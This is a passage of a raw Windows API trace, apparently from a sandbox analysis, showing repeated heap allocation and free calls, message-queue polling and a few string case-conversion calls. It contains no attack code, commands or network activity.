[0268.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0268.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0268.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0268.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0268.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0268.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0268.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0268.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0268.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0268.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0268.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0268.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0268.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0268.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0268.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0268.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0268.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0268.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0268.020] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0268.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0268.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0268.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0268.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0268.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0268.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0268.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0268.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0268.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0268.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0268.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0268.022] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0268.022] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0268.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0268.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0268.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0268.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0268.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0268.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0268.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0268.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0268.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0268.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0268.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0268.022] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0268.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0268.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0268.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0268.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0268.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0268.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0268.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0268.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0268.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0268.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0268.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0268.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0268.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0268.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0268.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0268.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0268.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0268.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0268.024] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0268.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0268.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0268.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0268.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0268.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0268.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0268.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0268.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0268.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0268.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0268.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0268.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0268.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0268.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0268.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0268.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0268.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0268.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0268.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0268.029] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0268.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0268.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0268.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0268.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0268.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0268.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0268.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0268.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0268.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0268.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0268.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0268.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0268.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0268.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0268.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0268.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0268.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0268.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0268.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0268.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0268.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0268.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0268.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0268.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0268.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0268.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0268.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0268.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.031] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0268.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0268.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0268.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0268.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0268.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.032] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0268.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0268.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0268.032] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0268.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0268.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0268.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0268.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0268.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0268.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0268.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0268.033] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0268.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0268.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0268.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0268.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0268.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0268.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0268.033] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0268.033] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, 